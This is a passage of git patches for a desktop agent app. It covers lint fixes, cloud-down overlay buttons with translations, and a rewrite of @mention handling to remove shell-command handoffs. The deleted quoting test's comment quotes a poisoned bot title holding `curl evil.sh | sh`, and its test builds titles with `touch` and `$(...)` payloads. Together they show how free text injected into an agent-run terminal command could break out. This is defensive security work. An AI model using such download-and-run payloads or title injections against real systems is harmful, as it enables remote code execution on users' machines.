'显示最近日志', signedInTitle: '已登录', From 175565785a30fba0e1d1c6b18e79eab11d3014eb Mon Sep 17 00:00:00 2001 From: "Axl Ibiza, MBA" Date: Mon, 17 Aug 2026 11:57:40 -0500 Subject: [PATCH 093/161] style(desktop): satisfy perfectionist lint on the 503 electron files MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit eslint --fix output: blank lines before statements and the import-order spacing in connection-config.test.ts that the check:lint gate rejects. Formatting only — no logic change. --- apps/desktop/electron/backend-health.test.ts | 2 ++ apps/desktop/electron/backend-health.ts | 1 + apps/desktop/electron/connection-config.test.ts | 11 ++++++++++- apps/desktop/electron/main.ts | 1 + 4 files changed, 14 insertions(+), 1 deletion(-) diff --git a/apps/desktop/electron/backend-health.test.ts b/apps/desktop/electron/backend-health.test.ts index 128bd7f502..21691bf3a0 100644 --- a/apps/desktop/electron/backend-health.test.ts +++ b/apps/desktop/electron/backend-health.test.ts @@ -421,6 +421,7 @@ test('waitForHermesReady surfaces actionable error for cloud agent 503', async ( test('waitForHermesReady does not cloud-wrap non-cloud 503 errors', async () => { const currentTime = { value: 0 } + try { await waitForHermesReady('http://127.0.0.1:9000', { fetchPublicJson: async () => { @@ -509,6 +510,7 @@ test('makeNousCloudBackendDownError preserves legacy string-prefix compatibility 'https://ares-3009.agents.nousresearch.com', new Error('503: Service Unavailable') ) + assert.ok(result) assert.equal((result as any).isCloudBackendDown, true) assert.equal((result as any).statusCode, 503) diff --git a/apps/desktop/electron/backend-health.ts b/apps/desktop/electron/backend-health.ts index ca3ae49520..ff380f1390 100644 --- a/apps/desktop/electron/backend-health.ts +++ b/apps/desktop/electron/backend-health.ts @@ -64,6 +64,7 @@ export function isServerSideHttpError(error: unknown): { if (Number.isInteger(structured) && (structured === 502 || structured === 503 || structured === 504)) { const detail = error.message + return { statusCode: structured, detail } } } diff --git a/apps/desktop/electron/connection-config.test.ts b/apps/desktop/electron/connection-config.test.ts index 55886761f8..b547889797 100644 --- a/apps/desktop/electron/connection-config.test.ts +++ b/apps/desktop/electron/connection-config.test.ts @@ -15,7 +15,6 @@ import assert from 'node:assert/strict' import { test } from 'vitest' import { makeNousCloudBackendDownError } from './backend-health' - import { apiRequestRegistryConnectionId, AT_COOKIE_VARIANTS, @@ -1173,11 +1172,13 @@ test('resolveTestWsUrl (oauth) requires a mintTicket function', async () => { test('gatewayTicketFailure preserves a structured 503 statusCode as a transport failure', () => { const source = new Error('upstream unavailable') as any source.statusCode = 503 + const wrapped = gatewayTicketFailure( source, 'auth message', 'transport message' ) + assert.equal(wrapped.message, 'transport message') assert.equal((wrapped as any).statusCode, 503) assert.equal((wrapped as any).needsOauthLogin, undefined) @@ -1188,11 +1189,13 @@ test('gatewayTicketFailure keeps 401 and 403 as reauth with needsOauthLogin', () for (const code of [401, 403]) { const source = new Error(`HTTP ${code}`) as any source.statusCode = code + const wrapped = gatewayTicketFailure( source, 'auth message', 'transport message' ) + assert.equal(wrapped.message, 'auth message') assert.equal((wrapped as any).needsOauthLogin, true) assert.equal((wrapped as any).statusCode, code) @@ -1205,11 +1208,13 @@ test('gatewayTicketFailure only copies an integer statusCode, not a message pref // classifier (makeNousCloudBackendDownError) handles the prefix at the mint // boundary. The wrapper must not invent an integer from the message. const source = new Error('503: Service Unavailable') as any + const wrapped = gatewayTicketFailure( source, 'auth message', 'transport message' ) + assert.equal((wrapped as any).statusCode, undefined) assert.equal((wrapped as any).needsOauthLogin, undefined) }) @@ -1227,10 +1232,12 @@ test('OAuth ticket-mint 503 surfaces the Cloud-down error (startup boundary)', ( // The exact production sequence from main.ts. const cloudError = makeNousCloudBackendDownError(baseUrl, ticketErr) + if (cloudError !== null) { assert.equal((cloudError as any).isCloudBackendDown, true) assert.equal((cloudError as any).statusCode, 503) assert.ok(cloudError.message.includes('Nous Cloud agent ares-3009.agents.nousresearch.com is down')) + return } @@ -1239,6 +1246,7 @@ test('OAuth ticket-mint 503 surfaces the Cloud-down error (startup boundary)', ( 'auth', 'transport' ) + assert.fail(`expected Cloud-down classification, got wrapper: ${wrapped.message}`) }) @@ -1255,6 +1263,7 @@ test('OAuth ticket-mint 401 stays on the reauth path (never Cloud-down)', () => 'auth message', 'transport message' ) + assert.equal(wrapped.message, 'auth message') assert.equal((wrapped as any).needsOauthLogin, true) assert.equal((wrapped as any).statusCode, 401) diff --git a/apps/desktop/electron/main.ts b/apps/desktop/electron/main.ts index e5f94479e9..c7b3025bf6 100644 --- a/apps/desktop/electron/main.ts +++ b/apps/desktop/electron/main.ts @@ -10913,6 +10913,7 @@ async function startHermes() { // only consumes the structured result (#85335). const isCloudBackendDown = Boolean(error && typeof error === 'object' && (error as any).isCloudBackendDown === true) + const statusCode = Number( error && typeof error === 'object' && Number.isInteger((error as any).statusCode) ? (error as any).statusCode From a9ddd0f0bd04f9ddad0d31ad1e22671423255661 Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 16:54:23 -0700 Subject: [PATCH 094/161] polish(desktop): cloud-down overlay gets Portal/Discord action buttons Follow-up on the #85373 salvage: the portal and Discord URLs move out of the localized hint prose into dedicated action buttons (URLs live in code, translations can't drift them), matching the layered error card's action-row idiom from #91493. Overlay test updated to the button contract; all five locales updated. --- .../components/boot-failure-overlay.test.tsx | 9 ++++-- .../src/components/boot-failure-overlay.tsx | 28 ++++++++++++++++--- apps/desktop/src/i18n/ar.ts | 4 ++- apps/desktop/src/i18n/en.ts | 4 ++- apps/desktop/src/i18n/ja.ts | 4 ++- apps/desktop/src/i18n/types.ts | 2 ++ apps/desktop/src/i18n/zh-hant.ts | 4 ++- apps/desktop/src/i18n/zh.ts | 4 ++- 8 files changed, 47 insertions(+), 12 deletions(-) diff --git a/apps/desktop/src/components/boot-failure-overlay.test.tsx b/apps/desktop/src/components/boot-failure-overlay.test.tsx index a0dc71b024..db03d6d046 100644 --- a/apps/desktop/src/components/boot-failure-overlay.test.tsx +++ b/apps/desktop/src/components/boot-failure-overlay.test.tsx @@ -116,10 +116,13 @@ describe('BootFailureOverlay', () => { try { render() - // Cloud-specific title + actionable portal guidance instead of the - // generic remote-failure copy. + // Cloud-specific title + actionable recovery instead of the generic + // remote-failure copy. expect(await screen.findByText(/Nous Cloud agent is down/i)).toBeTruthy() - expect(screen.getByText(/portal\.nousresearch\.com/i)).toBeTruthy() + // Portal and Discord are dedicated action buttons (localized labels + // can't drift the URLs, which live in code). + expect(screen.getByRole('button', { name: /check portal status/i })).toBeTruthy() + expect(screen.getByRole('button', { name: /get help on discord/i })).toBeTruthy() // Cloud-down is a remote failure: local-only Repair is dropped; the // actionable paths are Gateway settings + Use local gateway. expect(screen.queryByRole('button', { name: /repair/i })).toBeNull() diff --git a/apps/desktop/src/components/boot-failure-overlay.tsx b/apps/desktop/src/components/boot-failure-overlay.tsx index 246b9525df..2d71eca10c 100644 --- a/apps/desktop/src/components/boot-failure-overlay.tsx +++ b/apps/desktop/src/components/boot-failure-overlay.tsx @@ -7,7 +7,8 @@ import { Loader } from '@/components/ui/loader' import { LogView } from '@/components/ui/log-view' import type { DesktopConnectionConfig } from '@/global' import { useI18n } from '@/i18n' -import { ChevronLeft, FileText, Loader2, LogIn, RefreshCw, SlidersHorizontal, Wrench } from '@/lib/icons' +import { openExternalLink } from '@/lib/external-link' +import { ChevronLeft, ExternalLink, FileText, Loader2, LogIn, RefreshCw, SlidersHorizontal, Wrench } from '@/lib/icons' import { $desktopBoot } from '@/store/boot' import { notify, notifyError } from '@/store/notifications' import { $desktopOnboarding } from '@/store/onboarding' @@ -268,9 +269,28 @@ export function BootFailureOverlay() { hint = copy.remoteSignInHint(label) } else if (cloudDown) { // A Nous Cloud agent is down — the user cannot restart the managed - // instance and Repair is local-only, so the actionable paths are Gateway - // settings (switch host / use local), a secondary Retry, and open logs. - actions = [settingsAction, { ...retryAction, variant: 'secondary' }, localAction] + // instance and Repair is local-only. Lead with the paths that actually + // resolve it: check the portal (status/instance controls), switch to the + // local gateway, retry, or get support on Discord. Portal/Discord are + // buttons (not URLs buried in the hint prose) so localized hints can't + // drift the links. + actions = [ + { + key: 'portal', + label: copy.cloudDownCheckPortal, + onClick: () => openExternalLink('https://portal.nousresearch.com'), + icon: + }, + localAction, + { ...retryAction, variant: 'secondary' }, + { + key: 'discord', + label: copy.cloudDownDiscord, + onClick: () => openExternalLink('https://discord.gg/NousResearch'), + variant: 'ghost' + }, + { ...settingsAction, variant: 'ghost' } + ] hint = copy.cloudDownHint } else if (remoteFailure) { actions = [settingsAction, { ...retryAction, variant: 'secondary' }, localAction] diff --git a/apps/desktop/src/i18n/ar.ts b/apps/desktop/src/i18n/ar.ts index 43a71123e9..e029b9f1bf 100644 --- a/apps/desktop/src/i18n/ar.ts +++ b/apps/desktop/src/i18n/ar.ts @@ -87,7 +87,9 @@ export const ar = defineLocale({ useLocalGateway: 'استخدام البوابة المحلية', cloudDownTitle: 'عامل Nous Cloud معطّل', cloudDownDescription: 'يعيد عامل السحابة المُدار من Nous الذي يتصل به هذا البوابة خطأً من الخادم. لا يمكن إعادة تشغيله من هنا — تحقق من حالته، أو بدّل إلى البوابة المحلية، أو احصل على الدعم.', - cloudDownHint: 'تحقق من https://portal.nousresearch.com لحالة الخادم، أو استخدم البوابة المحلية أدناه، أو تواصل معنا عبر Discord (discord.gg/NousResearch).', + cloudDownHint: 'تفتح الأزرار أدناه بوابة Nous (حالة المثيل وعناصر التحكم) أو Discord للحصول على الدعم.', + cloudDownCheckPortal: 'التحقق من حالة البوابة', + cloudDownDiscord: 'الحصول على مساعدة عبر Discord', openLogs: 'فتح السجلات', repairHint: 'يعيد الإصلاح تشغيل المثبت وقد يستغرق بضع دقائق على جهاز جديد.', remoteSignInHint: signInLabel => diff --git a/apps/desktop/src/i18n/en.ts b/apps/desktop/src/i18n/en.ts index 6db27de9f7..1adb019c81 100644 --- a/apps/desktop/src/i18n/en.ts +++ b/apps/desktop/src/i18n/en.ts @@ -106,7 +106,9 @@ export const en: Translations = { cloudDownDescription: 'The Nous-managed cloud agent this gateway connects to is returning a server error. It cannot be restarted from here — check its status, switch to the local gateway, or get support.', cloudDownHint: - 'Check https://portal.nousresearch.com for backend status, use the local gateway below, or reach out on Discord (discord.gg/NousResearch).', + 'The buttons below open the Nous Portal (instance status and controls) and our Discord for support.', + cloudDownCheckPortal: 'Check Portal status', + cloudDownDiscord: 'Get help on Discord', hideRecentLogs: 'Hide recent logs', showRecentLogs: 'Show recent logs', signedInTitle: 'Signed in', diff --git a/apps/desktop/src/i18n/ja.ts b/apps/desktop/src/i18n/ja.ts index 2ec6066b74..5e522df6dd 100644 --- a/apps/desktop/src/i18n/ja.ts +++ b/apps/desktop/src/i18n/ja.ts @@ -107,7 +107,9 @@ export const ja = defineLocale({ cloudDownDescription: 'このゲートウェイが接続している Nous 管理のクラウドエージェントがサーバーエラーを返しています。ここから再起動することはできません。ステータスを確認するか、ローカルゲートウェイに切り替えるか、サポートに連絡してください。', cloudDownHint: - 'https://portal.nousresearch.com でバックエンドのステータスを確認するか、下のローカルゲートウェイを使用するか、Discord (discord.gg/NousResearch) でご連絡ください。', + '下のボタンから Nous Portal(インスタンスの状態と操作)を開くか、Discord でサポートを受けられます。', + cloudDownCheckPortal: 'Portal のステータスを確認', + cloudDownDiscord: 'Discord でサポートを受ける', hideRecentLogs: '最近のログを非表示', showRecentLogs: '最近のログを表示', signedInTitle: 'サインインしました', diff --git a/apps/desktop/src/i18n/types.ts b/apps/desktop/src/i18n/types.ts index a28249ee49..4440e5134f 100644 --- a/apps/desktop/src/i18n/types.ts +++ b/apps/desktop/src/i18n/types.ts @@ -148,6 +148,8 @@ export interface Translations { cloudDownTitle: string cloudDownDescription: string cloudDownHint: string + cloudDownCheckPortal: string + cloudDownDiscord: string hideRecentLogs: string showRecentLogs: string signedInTitle: string diff --git a/apps/desktop/src/i18n/zh-hant.ts b/apps/desktop/src/i18n/zh-hant.ts index 505e799dc1..9178997e1e 100644 --- a/apps/desktop/src/i18n/zh-hant.ts +++ b/apps/desktop/src/i18n/zh-hant.ts @@ -102,7 +102,9 @@ export const zhHant = defineLocale({ remoteFailureHint: '在「閘道設定」中檢查閘道 URL 與登入,或切換至本機閘道。', cloudDownTitle: 'Nous Cloud 代理已停機', cloudDownDescription: '此閘道連線的 Nous 託管雲端代理正在回傳伺服器錯誤。無法在此處重新啟動——請檢查其狀態、切換至本機閘道,或取得支援。', - cloudDownHint: '請前往 https://portal.nousresearch.com 查看後端狀態,使用下方的本機閘道,或在 Discord (discord.gg/NousResearch) 上與我們聯繫。', + cloudDownHint: '使用下方按鈕開啟 Nous Portal(檢視執行個體狀態與操作)或加入 Discord 取得支援。', + cloudDownCheckPortal: '查看 Portal 狀態', + cloudDownDiscord: '在 Discord 取得協助', hideRecentLogs: '隱藏最近記錄', showRecentLogs: '顯示最近記錄', signedInTitle: '已登入', diff --git a/apps/desktop/src/i18n/zh.ts b/apps/desktop/src/i18n/zh.ts index db548684dd..5423d13af8 100644 --- a/apps/desktop/src/i18n/zh.ts +++ b/apps/desktop/src/i18n/zh.ts @@ -102,7 +102,9 @@ export const zh: Translations = { remoteFailureHint: '在“网关设置”中检查网关 URL 和登录,或切换到本地网关。', cloudDownTitle: 'Nous Cloud 代理已宕机', cloudDownDescription: '此网关连接的 Nous 托管云代理正在返回服务器错误。无法在此处重启——请检查其状态、切换到本地网关或获取支持。', - cloudDownHint: '请访问 https://portal.nousresearch.com 查看后端状态,使用下方的本地网关,或在 Discord (discord.gg/NousResearch) 上联系我们。', + cloudDownHint: '使用下方按钮打开 Nous Portal(查看实例状态与操作)或加入 Discord 获取支持。', + cloudDownCheckPortal: '查看 Portal 状态', + cloudDownDiscord: '在 Discord 获取帮助', hideRecentLogs: '隐藏最近日志', showRecentLogs: '显示最近日志', signedInTitle: '已登录', From be98423fe1596950d8d1a9f9089efc109b82b128 Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 17:31:12 -0700 Subject: [PATCH 095/161] test(desktop): advance the mock clock in the cloud-503 readiness tests MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The two waitForHermesReady cloud-503 tests froze now() at 0, so the readiness loop never crossed its deadline — the vitest electron project hung for the full 20-minute CI budget. Advance the clock per poll like the sibling readiness tests do. --- apps/desktop/electron/backend-health.test.ts | 16 ++++++++++++++-- 1 file changed, 14 insertions(+), 2 deletions(-) diff --git a/apps/desktop/electron/backend-health.test.ts b/apps/desktop/electron/backend-health.test.ts index 21691bf3a0..d1dd26815e 100644 --- a/apps/desktop/electron/backend-health.test.ts +++ b/apps/desktop/electron/backend-health.test.ts @@ -403,7 +403,14 @@ test('waitForHermesReady surfaces actionable error for cloud agent 503', async ( throw new Error('503: Service Unavailable') }, sleep: async () => {}, - now: () => currentTime.value, + // Advance the mock clock per poll — a frozen now() never crosses the + // deadline and the readiness loop spins forever (hung the whole vitest + // electron project for 20m in CI). + now: () => { + currentTime.value += 20 + + return currentTime.value + }, timeoutMs: 100, pollMs: 1 }) @@ -431,7 +438,12 @@ test('waitForHermesReady does not cloud-wrap non-cloud 503 errors', async () => throw new Error('503: Service Unavailable') }, sleep: async () => {}, - now: () => currentTime.value, + // Same advancing clock as above — frozen now() = infinite loop. + now: () => { + currentTime.value += 20 + + return currentTime.value + }, timeoutMs: 100, pollMs: 1 }) From 729782d058e683875bed55ad060d56925fe1e86a Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 16:46:07 -0700 Subject: [PATCH 096/161] =?UTF-8?q?feat(bot-mode):=20@mention=20middleware?= =?UTF-8?q?=20identifies,=20never=20delivers=20=E2=80=94=20the=20agent=20o?= =?UTF-8?q?wns=20messaging?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The composer middleware is now identification-only: it resolves the user's @tags against the live roster and annotates the draft with who they refer to (profile, friendly title, device for cross-connection rows). The agent decides whether to contact them and does it through its message_agent tool — one send path, composed messages only. Deleted the renderer's entire parallel delivery transport: deliverRemoteRosterMentions / pollRemoteDmReply / ensureRemoteCanonicalChat and the injected shellout instructions ('[@mention handoff — run hermes -p …]' and 'Desktop is delivering … over Connections'). This retires the whole invocation bug class at the source instead of sanitizing it: no verbatim user text is ever forwarded by the renderer (#91397), and no shell command is ever composed from prompt text (#91304, #91339 shape). Tests: mention-identification.test.mjs replaces the two delivery-era files — identification note shape, no-shellout/no-delivery containment (sabotage-verified: re-adding a renderer delivery call fails 2 tests), poisoned-title inertness, pass-through for unknown @s, and a source contract pinning the deleted machinery. hide-bots + roster-cache-key harnesses re-pinned to the new contract. 390/390 green. --- .../desktop/src/plugins/hermes-bots/plugin.js | 228 ++---------------- .../hermes-bots/tests/hide-bots.test.mjs | 2 +- .../tests/mention-handoff-quoting.test.mjs | 204 ---------------- .../tests/mention-identification.test.mjs | 155 ++++++++++++ .../tests/mention-roster-cache-key.test.mjs | 12 +- .../tests/remote-dm-delivery.test.mjs | 134 ---------- website/docs/user-guide/bot-mode.md | 3 +- 7 files changed, 185 insertions(+), 553 deletions(-) delete mode 100644 apps/desktop/src/plugins/hermes-bots/tests/mention-handoff-quoting.test.mjs create mode 100644 apps/desktop/src/plugins/hermes-bots/tests/mention-identification.test.mjs delete mode 100644 apps/desktop/src/plugins/hermes-bots/tests/remote-dm-delivery.test.mjs diff --git a/apps/desktop/src/plugins/hermes-bots/plugin.js b/apps/desktop/src/plugins/hermes-bots/plugin.js index c5f783ddb3..d55604b6a6 100644 --- a/apps/desktop/src/plugins/hermes-bots/plugin.js +++ b/apps/desktop/src/plugins/hermes-bots/plugin.js @@ -4016,171 +4016,6 @@ function resolveRosterMentions(text, roster, active = {}) { return mentioned } -const REMOTE_DM_TIMEOUT_MS = 180000 -const REMOTE_DM_POLL_MS = 2000 - -/** The remote bot's canonical Bot Chat: pinned stored-id from its profile's - * ui_meta first, then resume-by-title, then create. Mirrors - * ensureGroupChatSession so DMs land in the ONE forever-chat instead of - * minting a fresh "Bot Chat" per mention. */ -async function ensureRemoteCanonicalChat(route, profile) { - let pinned = null - - try { - const listed = await host.requestProfile(route, 'profiles.list', {}) - const owner = listed?.profiles?.find(p => p.name === profile) - pinned = owner?.ui_meta?.['hermes-bots']?.chat || null - } catch { - /* older remote gateway — title lookup below still works */ - } - - for (const target of [pinned, 'Bot Chat']) { - if (!target) { - continue - } - - try { - const res = await host.requestProfile(route, 'session.resume', { - session_id: target, - profile, - omit_messages: true - }) - - if (res?.session_id) { - return { runtime: res.session_id, stored: res.session_key || pinned } - } - } catch { - /* fall through */ - } - } - - const created = await host.requestProfile(route, 'session.create', { - profile, - title: 'Bot Chat', - // Bot Mode sessions are always hidden from the global sidebar. - hidden: true - }) - - return { runtime: created?.session_id || null, stored: created?.stored_session_id || null } -} - -/** Bounded reply poll on the recipient's session — same shape as a group - * member turn: wait for a NEW assistant message after `before`, or time out. */ -async function pollRemoteDmReply(route, profile, sessionRef, before) { - const deadline = Date.now() + REMOTE_DM_TIMEOUT_MS - - while (Date.now() < deadline) { - await new Promise(resolve => setTimeout(resolve, REMOTE_DM_POLL_MS)) - - let state = null - - try { - state = await host.requestProfile(route, 'session.resume', { session_id: sessionRef, profile }) - } catch { - continue - } - - const messages = Array.isArray(state?.messages) ? state.messages : [] - const done = !state?.inflight && !state?.running - - if (messages.length > before && done) { - for (let i = messages.length - 1; i >= 0; i--) { - const msg = messages[i] - - if (msg?.role === 'assistant') { - const text = typeof msg.content === 'string' - ? msg.content - : Array.isArray(msg.content) - ? msg.content.map(p => (typeof p === 'string' ? p : p?.text || '')).join('') - : msg?.text || '' - - return String(text).trim() || null - } - } - - return null - } - } - - return null -} - -/** Deliver a user mention to bots on OTHER connections: into each bot's - * canonical Bot Chat, with the standard sender-attribution prefix (so the - * recipient's messaging protocol recognizes an agent-to-agent message), then - * relay the reply back as a notification. Sequential and fire-and-forget - * from the composer's perspective. */ -async function deliverRemoteRosterMentions(bots, userText, sender) { - const text = String(userText || '').trim() - - if (!text || typeof host.requestProfile !== 'function') { - return - } - - const senderName = String(sender?.name || 'the user').trim() - const senderHandle = String(sender?.handle || senderName).trim() - - for (const bot of bots) { - const connectionId = String(bot?.connectionId || '').trim() - const profile = String(bot?.name || '').trim() || 'default' - - if (!connectionId || connectionId === 'local') { - continue - } - - const route = { connectionId, mode: 'remote', profile, targetProfile: profile } - const label = bot.connectionLabel || connectionId - - try { - const { runtime, stored } = await ensureRemoteCanonicalChat(route, profile) - - if (!runtime) { - throw new Error('No remote session') - } - - // Baseline before our submit, so the poll can spot the NEW reply. - let before = 0 - - try { - const pre = await host.requestProfile(route, 'session.resume', { session_id: stored || runtime, profile }) - before = Array.isArray(pre?.messages) ? pre.messages.length : pre?.message_count || 0 - } catch { - /* lazy session — zero messages */ - } - - // The delivery prefix is the recipient's cue that an agent (not its - // human) is talking — same contract as the local CLI handoff. - await host.requestProfile(route, 'prompt.submit', { - session_id: runtime, - text: `Message from \u{1F916} ${senderName} (@${senderHandle}): ${text}` - }) - host.notify?.({ - kind: 'info', - title: displayName(bot), - message: `Messaged @${botHandle(profile, bot)} on ${label} — will relay the reply here.` - }) - - const reply = await pollRemoteDmReply(route, profile, stored || runtime, before) - - if (reply) { - host.notify?.({ - kind: 'info', - title: `\u{1F916} ${displayName(bot)} (${label})`, - message: reply.slice(0, 500) - }) - } else { - host.notify?.({ - kind: 'info', - title: displayName(bot), - message: `No reply from @${botHandle(profile, bot)} yet — check its Bot Chat on ${label}.` - }) - } - } catch (error) { - host.notifyError?.(error, `Could not reach ${label}`) - } - } -} - /** Source-qualified identity for a roster row — the React list key AND the * cross-surface roster identity. Names alone are NOT unique in a * multi-source roster (two connections can both expose 'default'); @@ -8641,13 +8476,6 @@ function shellQuote(value) { return `'${String(value).replaceAll("'", "'\"'\"'")}'` } -/** Escape for interpolation INSIDE an existing double-quoted shell string: - * keeps ", `, $, and \ literal so free-text titles (which sync from ui_meta) - * and gateway profile names can't expand or break out of the quotes. */ -function shellDoubleQuote(value) { - return String(value).replace(/[\\"`$]/g, ch => '\\' + ch) -} - function routineInputError(title, instruction) { if (String(title).includes('\0')) { return 'Cronjob name cannot contain NUL (U+0000).' @@ -12003,10 +11831,13 @@ export default { } }) - // @-mention middleware: "@ do the thing" in any chat becomes an - // explicit handoff instruction the active agent's SOUL.md knows how to - // execute. Names are validated against the LIVE roster so - // "user@example.com" or an unknown @ passes through untouched. + // @-mention middleware: "@ do the thing" in any chat gets an + // IDENTIFICATION note — who the user is referring to, resolved against + // the LIVE roster ("user@example.com" or an unknown @ passes through + // untouched). The middleware never delivers anything itself: the agent + // owns messaging via its message_agent tool (Bot Chats), so there is + // exactly one send path and user text is never forwarded verbatim by + // the renderer. The composer's @-autocomplete remains the picking aid. ctx.register({ id: 'mention-middleware', area: COMPOSER_AREAS.middleware, @@ -12068,35 +11899,22 @@ export default { return draft } - const localMentions = mentionedBots.filter(bot => !bot.remoteSource) - const remoteMentions = mentionedBots.filter(bot => bot.remoteSource) - - const activeMeta = $botMeta.get()[live.name] - const senderName = displayName({ name: live.name, title: activeMeta?.title }, activeMeta) - - if (remoteMentions.length && typeof host.requestProfile === 'function') { - void deliverRemoteRosterMentions(remoteMentions, text, { - name: senderName, - handle: botHandle(live.name) - }) - } - let note = '' - - if (localMentions.length) { - note += - '\n\n[@mention handoff — for each mentioned agent (' + localMentions.map(bot => botHandle(bot.name, bot)).join(', ') + '): ' + - 'COMPOSE a message from you (' + senderName + ') to that agent conveying what the user wants — do not forward this text verbatim (avoid double quotes in your composed message). Send it with exactly one terminal call, run with background=true AND notify_on_complete=true (the recipient may take minutes; the user must not be blocked):\n' + - localMentions.map(bot => '`hermes -p ' + shellQuote(bot.name) + ' chat --in ~ -c "Bot Chat" --create-if-missing -Q -q "Message from 🤖 ' + shellDoubleQuote(senderName) + ' (@' + shellDoubleQuote(botHandle(live.name)) + '): "`').join('\n') + - '\nAfter dispatching, tell the user the message was sent and END YOUR TURN — do not wait or poll; when the background process completes, its notification carries the reply — relay it then, attributed to that agent. ' + - 'Relay the reply back to the user, attributed to that agent.]' - } - - if (remoteMentions.length) { - const labels = remoteMentions.map(bot => `@${botHandle(bot.name, bot)} (${bot.connectionLabel || bot.connectionId})`).join(', ') - note += - '\n\n[@mention — stay on this device. Desktop is delivering to ' + labels + - ' over Connections in the background. Do not run hermes -p for them and do not switch Gateway. Tell the user they were messaged here; when a reply lands, relay it attributed to that agent.]' - } + // Identification only. Each line names the agent the user's tag + // resolves to (friendly title + device for cross-connection rows), + // so the agent knows exactly who "@research-buddy" is without the + // renderer ever acting on the user's behalf. + const lines = mentionedBots.map(bot => { + const handle = botHandle(bot.name, bot) + const title = String(botRosterMeta(bot, $botMeta.get())?.title || bot.ui_meta?.['hermes-bots']?.title || bot.title || '').trim() + const where = bot.remoteSource + ? ` — on ${bot.connectionLabel || bot.connectionId}` + : '' + return `@${handle} = agent profile "${bot.name}"${title ? ` ("${title}")` : ''}${where}` + }) + const note = + '\n\n[@mentions resolved from the Bot Mode roster — the user is referring to: ' + + lines.join('; ') + + '. If they want one of these agents contacted, compose your own message and send it with your message_agent tool; never forward the user\u2019s text verbatim. If this session has no message_agent tool, agent messaging is unavailable here — say so.]' return { ...draft, text: text + note } } } diff --git a/apps/desktop/src/plugins/hermes-bots/tests/hide-bots.test.mjs b/apps/desktop/src/plugins/hermes-bots/tests/hide-bots.test.mjs index 5881984b13..7e85fc09f4 100644 --- a/apps/desktop/src/plugins/hermes-bots/tests/hide-bots.test.mjs +++ b/apps/desktop/src/plugins/hermes-bots/tests/hide-bots.test.mjs @@ -217,7 +217,7 @@ test('shape: hiding never filters mentions, group flows, or the meta/activity sw // Mention resolution never consults the hidden flag. const mentions = pluginSource.slice( pluginSource.indexOf('function resolveRosterMentions('), - pluginSource.indexOf('const REMOTE_DM_TIMEOUT_MS') + pluginSource.indexOf('/** Source-qualified identity for a roster row') ) assert.doesNotMatch(mentions, /hidden/i) }) diff --git a/apps/desktop/src/plugins/hermes-bots/tests/mention-handoff-quoting.test.mjs b/apps/desktop/src/plugins/hermes-bots/tests/mention-handoff-quoting.test.mjs deleted file mode 100644 index aef58e4f4d..0000000000 --- a/apps/desktop/src/plugins/hermes-bots/tests/mention-handoff-quoting.test.mjs +++ /dev/null @@ -1,204 +0,0 @@ -import assert from 'node:assert/strict' -import { spawnSync } from 'node:child_process' -import { existsSync, readFileSync, rmSync } from 'node:fs' -import test from 'node:test' -import vm from 'node:vm' - -// The @mention middleware appends a handoff note whose hermes command the -// active agent runs verbatim in its terminal. The sender display name and -// @handle used to be interpolated into the double-quoted -q argument (and -// the recipient name sat unquoted after -p) with no escaping — a bot title -// like `x" ; curl evil.sh | sh ; echo "` (titles are free text and sync from -// ui_meta, i.e. other machines / the gateway) broke out into real commands, -// and $(...) inside double quotes expanded even without a breakout. Same -// class as the delegated-routine fix for #21. - -const pluginSource = readFileSync(new URL('../plugin.js', import.meta.url), 'utf8') - -function load({ - activeProfile = 'research', - focusedProfile = activeProfile, - profiles = ['research', 'ops'], - title = null -} = {}) { - const values = new Map() - const atom = initial => { - const slot = { get: () => values.get(slot), set: value => values.set(slot, value) } - values.set(slot, initial) - return slot - } - const context = { - atom, - PALETTE_AREA: 'palette', - COMPOSER_AREAS: { middleware: 'middleware' }, - document: { getElementById: () => null, createElement: () => ({}), head: { appendChild: () => undefined } }, - host: { - request: async method => { - if (method === 'profiles.list') { - return { - profiles: profiles.map(profile => - typeof profile === 'string' ? { name: profile } : profile - ) - } - } - return {} - }, - state: { - profile: { get: () => activeProfile, listen: () => undefined }, - focusedSessionProfile: { get: () => focusedProfile, listen: () => undefined }, - gateway: { listen: () => undefined } - } - } - } - const source = pluginSource - .replace(/^import\s+\*\s+as\s+sdk\s+from '@hermes\/plugin-sdk'\r?\n/m, '') - .replace(/^import\s+\{[\s\S]*?\}\s+from '@hermes\/plugin-sdk'\r?\n/m, '') - .replace(/^const \{ McpTab, ToolsetConfigPanel \} = sdk\r?\n/m, '') - .replace(/^import .* from 'react'\r?\n/m, '') - .replace(/^import .* from 'react\/jsx-runtime'\r?\n/m, '') - .replace('export default {', 'globalThis.plugin = {') - .concat('\nglobalThis.__mention = { $botMeta };\n') - vm.runInNewContext(source, context, { filename: 'plugin.js' }) - context.__mention.$botMeta.set(title ? { [activeProfile]: { title } } : {}) - - const registered = [] - context.plugin.register({ storage: { get: () => null }, register: entry => registered.push(entry) }) - const middleware = registered.find(entry => entry.id === 'mention-middleware') - assert.ok(middleware, 'mention middleware did not register') - return { handler: middleware.data.handler } -} - -/** Run the note's first hermes command under a stub that echoes each argv - * element — proves the shell received the interpolations as LITERALS. */ -function runHandoffCommand(noteText) { - const command = noteText.match(/`hermes -p [^`]*`/)[0].slice(1, -1) - const script = `hermes() { printf '%s\\037' "$@"; }\n${command}` - const result = spawnSync('sh', ['-c', script], { encoding: 'utf8' }) - assert.equal(result.status, 0, result.stderr) - return result.stdout.split('\x1f').slice(0, -1) -} - -test('security: a poisoned bot title stays literal in the handoff command', async () => { - const quoteSentinel = `/tmp/hermes-bot-mode-mention-quote-${process.pid}` - const subSentinel = `/tmp/hermes-bot-mode-mention-sub-${process.pid}` - rmSync(quoteSentinel, { force: true }) - rmSync(subSentinel, { force: true }) - - const title = `Evil" ; touch ${quoteSentinel} ; echo "$(touch ${subSentinel})"` - const { handler } = load({ title }) - - const result = await handler({ text: 'please @ops review the diff' }) - assert.ok(result.text.includes('[@mention handoff')) - - const args = 